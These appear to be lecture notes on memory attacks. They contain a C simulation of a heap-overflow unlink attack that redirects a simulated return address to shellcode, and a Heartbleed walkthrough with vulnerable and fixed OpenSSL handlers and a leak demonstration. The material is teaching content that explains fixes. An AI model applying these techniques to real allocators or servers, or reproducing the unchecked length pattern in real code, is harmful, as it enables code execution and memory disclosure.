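/* Attack: overflow the 16-byte buffer by exactly one header so next_hdr's links are
 * attacker-chosen, then let the allocator coalesce. Returns 1 if the return address
 * now points at the shellcode. */
int attack_demo(void)
{
    chunk_t a = {32, NULL, NULL}, c = {32, NULL, NULL};
    chunk_t forged;
    unsigned char input[16 + sizeof(chunk_t)];

    memset(&heap, 0, sizeof heap);
    memset(&frame, 0, sizeof frame);
    memset(shellcode.bytes, 0x90, sizeof shellcode.bytes);   /* NOP sled stand-in */

    /* next_hdr is a legitimate free chunk between a and c on the free list. */
    heap.l.hdr.size = 16;
    heap.l.next_hdr.size = 32;
    a.fd = &heap.l.next_hdr; heap.l.next_hdr.bk = &a;
    heap.l.next_hdr.fd = &c;  c.bk = &heap.l.next_hdr;

    /* Attacker's input: 16 bytes of filler, then a forged header for next_hdr.
     * fd is chosen so that write 1 (FD->bk = BK) lands exactly on the saved return
     * address; bk is the value that should be written there. */
    memset(&forged, 0, sizeof forged);
    forged.size = 32;
    forged.fd = (chunk_t *)((char *)&frame.saved_return - offsetof(chunk_t, bk));
    forged.bk = &shellcode.as_chunk;
    memset(input, 'A', 16);
    memcpy(input + 16, &forged, sizeof forged);

    /* The program copies too much into its 16-byte buffer... */
    memcpy(heap.raw + offsetof(struct heap_layout, data), input, sizeof input);
    /* ...and later the allocator coalesces next_hdr, running the two writes. */
    unlink_chunk(&heap.l.next_hdr);

    /* Write 2 (BK->fd = FD) also lands inside the shellcode, at offsetof(chunk_t, fd):
     * real payloads start with a short jump over that spot. The bytes before it survive. */
    return frame.saved_return == &shellcode.as_chunk
        && shellcode.as_chunk.fd == forged.fd
        && shellcode.bytes[0] == 0x90;
}

int main(void)
{
    printf("normal unlink stitches the list: %d\n", normal_unlink_demo());
    printf("forged links hijack the return address: %d\n", attack_demo());
    return 0;
}
```

The example also shows why the fix in real allocators is a check rather than a different data structure: glibc's later "safe unlinking" verifies FD->bk == p and BK->fd == p before the two writes, which the forged fd and bk above cannot satisfy.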

Page 49

Memory attack 2: heap overflow

Forms another mechanism for vectoring to code... Heap attacks have been done on both the Java heap and the native process heap.

An example heap attack was the Microsoft GDI+ WMF heap overflow (2009). There were exploits of this in the wild.

According to Symantec, in the Microsoft GDI+ WMF attack:

A remote code execution vulnerability exists in the way that GDI+ allocates buffer size when handling WMF image files. The vulnerability could allow remote code execution if a user opens a specially crafted WMF image file or browses to a Web site that contains specially crafted content. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Page 50

Outline: Memory issues: OpenSSL Heartbeat/memory attack (April 2014)

Page 51

OpenSSL Heartbeat

What is a heartbeat in openssl? A heartbeat is a recent (February 2012) extension to TLS and DTLS, to allow a client to check if a TLS server is still alive (rather than tearing down a connection and renegotiating). It is described in https://tools.ietf.org/html/rfc6520. The general idea is that clients can request a heartbeat, sending a heartbeat_request message with this structure:

    struct {
        HeartbeatMessageType type;
        uint16 payload_length;
        opaque payload[payload_length];
        ...
    } HeartbeatMessage;

The server will send back the payload in a matching heartbeat_response.

What is the issue? What if the client lied about the payload_length?

Page 52

OpenSSL Heartbeat, Hearts bleed

Request and response different...

Page 53

OpenSSL Heartbeat

Original openssl-1.0.1f/ssl/d1_both.c

    ...
    /* Read type and payload length first */
    hbtype = *p++;
    n2s(p, payload);
    pl = p;
    ...

The original source gets the type from the record that p points to, and puts it into hbtype. It then copies the next two bytes (network byte order, via n2s) into the variable payload. This is the payload length as claimed by the client, and it is taken without checking it against the length of the record that was actually received (s->s3->rrec.length). The variable pl points at the actual payload, which is later copied into the response using the claimed length, again without checking: a short request claiming a large payload_length makes the server echo up to 64 KB of whatever happens to follow the request in its memory.

Fixed openssl-1.0.1g/ssl/d1_both.c

    ...
    /* Read type and payload length first */
    hbtype = *p++;
    n2s(p, payload);
    if (1 + 2 + payload + 16 > s->s3->rrec.length)
        return 0; /* silently discard */
    pl = p;
    ...

(There is a little more, but that is the general idea.) The check says: type byte, two length bytes, the claimed payload and the 16 bytes of padding must all fit inside the record we actually received; otherwise the client lied.
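The two handler shapes above, side by side, over a constructed block of "server memory" so that the effect of the missing check can be observed. This is an added example written for this page, not OpenSSL's code: the n2s/s2n macros mirror OpenSSL's, the 16-byte padding constant is the 16 in the fixed check above, and everything else (function names, the 128-byte arena, the secret placed behind the request, the zeroed padding) is invented for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TLS1_HB_REQUEST  1
#define TLS1_HB_RESPONSE 2
#define HB_PADDING       16

/* Network-order 16-bit read/write that advance the pointer, as in OpenSSL. */
#define n2s(c, s) ((s) = (((unsigned int)(c)[0]) << 8) | ((unsigned int)(c)[1]), (c) += 2)
#define s2n(s, c) ((c)[0] = (uint8_t)((s) >> 8), (c)[1] = (uint8_t)(s), (c) += 2)

/* Build the response the way the handler does: type, length, echoed payload, padding.
 * memcpy copies `payload` bytes from pl whatever those bytes are. */
static size_t build_response(const uint8_t *pl, unsigned int payload, uint8_t *out)
{
    uint8_t *bp = out;
    *bp++ = TLS1_HB_RESPONSE;
    s2n(payload, bp);
    memcpy(bp, pl, payload);
    bp += payload;
    memset(bp, 0, HB_PADDING);            /* OpenSSL fills this with random bytes */
    return (size_t)(bp - out) + HB_PADDING;
}

/* 1.0.1f shape: the client's payload_length is trusted; rrec_len is never consulted. */
size_t heartbeat_vulnerable(const uint8_t *rec, size_t rrec_len, uint8_t *out)
{
    const uint8_t *p = rec;
    unsigned int payload;
    uint8_t hbtype = *p++;
    (void)rrec_len;
    n2s(p, payload);
    if (hbtype != TLS1_HB_REQUEST)
        return 0;
    return build_response(p, payload, out);
}

/* 1.0.1g shape: the claim must fit inside the record actually received. */
size_t heartbeat_fixed(const uint8_t *rec, size_t rrec_len, uint8_t *out)
{
    const uint8_t *p = rec;
    unsigned int payload;
    uint8_t hbtype;
    if (1 + 2 + HB_PADDING > rrec_len)
        return 0;                          /* silently discard: too short to be valid */
    hbtype = *p++;
    n2s(p, payload);
    if (1 + 2 + payload + HB_PADDING > rrec_len)
        return 0;                          /* silently discard: client lied about payload_length */
    if (hbtype != TLS1_HB_REQUEST)
        return 0;
    return build_response(p, payload, out);
}

/* Constructed server memory: the received record at the front, and a little further on
 * something the client must never see (on a real server: other sessions' data, keys). */
#define ARENA_SIZE 128
static uint8_t arena[ARENA_SIZE];
static const char secret[] = "SECRET-PRIVATE-KEY";
static uint8_t response[1 + 2 + ARENA_SIZE + HB_PADDING];

/* Place a request carrying 5 real payload bytes but `claimed` as payload_length,
 * then run one of the handlers on it. Returns the response length (0 = discarded). */
size_t run_heartbeat(int use_fix, unsigned int claimed, uint8_t *out)
{
    uint8_t *p = arena;
    size_t rrec_len;
    if (claimed > ARENA_SIZE - 3)
        return 0;                          /* simulation guard only: keep the over-read in our arena */
    memset(arena, 'x', sizeof arena);
    *p++ = TLS1_HB_REQUEST;
    s2n(claimed, p);
    memcpy(p, "hello", 5);
    p += 5;
    memset(p, 0, HB_PADDING);
    p += HB_PADDING;
    rrec_len = (size_t)(p - arena);       /* 24: what the record layer actually delivered */
    memcpy(arena + 40, secret, sizeof secret);
    return use_fix ? heartbeat_fixed(arena, rrec_len, out)
                   : heartbeat_vulnerable(arena, rrec_len, out);
}

/* 1 if the secret appears anywhere in the first n bytes of buf. */
int leaks_secret(const uint8_t *buf, size_t n)
{
    size_t i, len = strlen(secret);
    for (i = 0; i + len <= n; i++)
        if (memcmp(buf + i, secret, len) == 0)
            return 1;
    return 0;
}

int main(void)
{
    size_t n = run_heartbeat(0, 100, response);
    printf("vulnerable: %zu bytes back, secret leaked: %d\n", n, leaks_secret(response, n));
    n = run_heartbeat(1, 100, response);
    printf("fixed: %zu bytes back (0 = discarded)\n", n);
    return 0;
}
```

With a claimed length of 100 the vulnerable handler answers a 24-byte request with 119 bytes, 37 of which lie beyond the request and include the secret; the fixed handler discards the request and still answers an honest one (claimed length 5) normally.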

Page 54

Summary...

The attacks. Overflow attacks can be used to execute arbitrary code (that is, code that is picked by the attacker).

This is obviously extremely dangerous.

In the case of applications or systems you build or design, the important thing is to make sure that buffers cannot be overrun: every length that drives a copy must be checked against the size of the buffer actually available (the Heartbeat fix is exactly such a check).

However, it may be that the attacked buffer or heap is part of the OS or a library you depend on, and not exactly your responsibility; then keeping it patched is.